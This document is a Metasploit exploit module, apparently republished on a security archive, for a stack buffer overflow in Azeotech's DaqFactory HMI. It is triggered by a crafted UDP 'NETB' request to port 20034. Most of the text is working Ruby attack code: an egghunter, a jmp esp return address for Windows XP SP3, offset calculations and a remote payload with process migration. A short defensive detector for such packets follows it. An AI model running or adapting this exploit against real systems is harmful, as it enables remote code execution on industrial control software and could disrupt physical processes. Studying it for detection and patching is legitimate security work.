DaqFactory HMI NETB Request Overflow
Source: http://www.metasploit.com  Author: mr_me  Published: 2011-09-20

##
# $Id: daq_factory_bof.rb 13750 2011-09-18 02:45:55Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking

 include Msf::Exploit::Remote::Udp
 include Msf::Exploit::Remote::Egghunter

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'DaqFactory HMI NETB Request Overflow',
   'Description'    => %q{
     This module exploits a stack buffer overflow in Azeotech's DaqFactory
     product. The specific vulnerability is triggered when sending a specially crafted
     'NETB' request to port 20034. Exploitation of this vulnerability may take a few
     seconds due to the use of egghunter. This vulnerability was one of the 14
     releases discovered by researcher Luigi Auriemma.
   },
   'Author'         =>
    [
     'Luigi Auriemma',  # Initial discovery, crash poc
     'mr_me <steventhomasseeley[at]gmail.com>',  # msf exploit
    ],

   'Version'        => '$Revision: 13750 $',
   'References'     =>
    [
     ['URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
     'InitialAutoRunScript' => 'migrate -f',
    },
   'Payload'        =>
    {
     'Space'    => 600,
     'BadChars' => "\x00",
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [
      'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3',
      {
       'Ret' => 0x100B9EDF,  # jmp esp PEGRP32A.dll
       'Offset' => 636,
      }
     ],
    ],
   'DisclosureDate' => 'Sep 13 2011',
   'DefaultTarget'  => 0))

  register_options(
   [
    # Required for EIP offset
    OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]),
    Opt::RPORT(20034)
   ], self.class)
 end

 def exploit
  connect_udp

  print_status("Trying target #{target.name}...")

  eggoptions = {
   :checksum => false,
   :eggtag => 'scar',
  }

  # Correct the offset according to the 2nd IP (DHCP) length.
  # A 15-character address gives an offset of 78 and every missing character
  # adds one byte of padding, down to 88 for a 5-character class A address
  # (slightly unlikely, but just in case). Anything outside that range is not
  # a dotted IPv4 address, so bail out before building a packet with a nil offset.
  iplen = datastore['DHCP'].length
  if iplen < 5 || iplen > 15
   raise ArgumentError, "DHCP must be a dotted IPv4 address (5 to 15 characters)"
  end
  offset = 93 - iplen

  # The target offset (636) was measured with a 13-character DHCP address
  # (offset 80); every extra byte of DHCP padding is taken from the trailer
  # so the overall packet length stays constant.
  finaloffset = target['Offset'] + 80 - offset

  # springboard onto our unmodified payload
  p = Rex::Arch::X86.jmp(750) + payload.encoded
  hunter, egg = generate_egghunter(p, payload_badchars, eggoptions)

  sploit  = "NETB"  # NETB request overflow
  sploit << rand_text_alpha_upper(233)
  sploit << "\x00"  # part of the packet structure
  sploit << rand_text_alpha_upper(offset)  # include the offset for the DHCP address
  sploit << make_nops(2)
  sploit << hunter
  sploit << rand_text_alpha_upper(52-hunter.length-2)
  sploit << [target.ret].pack("V")
  sploit << rand_text_alpha_upper(12)
  sploit << Rex::Arch::X86.jmp_short(-70)
  sploit << egg
  # packetlen needs to be adjusted to a max of 0x400 as per advisory
  sploit << rand_text_alpha_upper(finaloffset-egg.length)

  # The use of rand_text_alpha_upper() ensures we always get the same length for the
  # first IP address. See the following for more details:
  # http://dev.metasploit.com/redmine/issues/5453
  sploit[12,4] = rand_text_alpha_upper(4)

  udp_sock.put(sploit)

  handler
  disconnect_udp
 end

end
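As an added defensive example (not part of the original module or of Metasploit), the following Ruby flags UDP datagrams to port 20034 that carry an oversized or binary-laden "NETB" request of the kind this module sends; the 0x400 length threshold comes from the module's own comment about the advisory, and the non-printable ratio and sample datagrams are constructed assumptions.

```ruby
# Added example (not from the original module): flag suspicious "NETB"
# datagrams to DaqFactory's UDP port 20034, as a network monitor might.
DAQ_PORT   = 20034
NETB_MAGIC = "NETB".b
# The module's comment cites 0x400 as the maximum packet length from the
# advisory; treat anything at or above it as oversized (assumption).
MAX_NETB_LEN = 0x400

# Returns an array of reason strings; empty means nothing was flagged.
def netb_findings(dst_port, payload)
  payload  = payload.b
  findings = []
  return findings unless dst_port == DAQ_PORT && payload.start_with?(NETB_MAGIC)

  if payload.length >= MAX_NETB_LEN
    findings << "oversized NETB request (#{payload.length} bytes)"
  end

  # The module puts a NUL after the first 233 bytes of the body and places the
  # overflow material after it, so examine the bytes following the first NUL.
  body = payload[NETB_MAGIC.length..-1]
  nul  = body.index("\x00".b)
  if nul && nul + 1 < body.length
    tail     = body[(nul + 1)..-1]
    nonprint = tail.count("^\x20-\x7e")
    # More than one eighth non-printable bytes (assumed ratio) is unlike the
    # alphanumeric content a legitimate request would carry.
    if nonprint > tail.length / 8
      findings << "#{nonprint} non-printable bytes after header NUL"
    end
  end
  findings
end

def suspicious_netb?(dst_port, payload)
  !netb_findings(dst_port, payload).empty?
end

# Constructed sample datagrams, not captured traffic.
BENIGN_PKT    = "NETB" + "A" * 40 + "\x00" + "HELLO"
OVERSIZED_PKT = "NETB" + "A" * 233 + "\x00" + "B" * 1000
BINARY_PKT    = "NETB" + "A" * 40 + "\x00" + ("\x90".b * 24)

if __FILE__ == $0
  [BENIGN_PKT, OVERSIZED_PKT, BINARY_PKT].each do |pkt|
    puts "#{pkt.length} bytes: #{netb_findings(DAQ_PORT, pkt).inspect}"
  end
end
```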

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved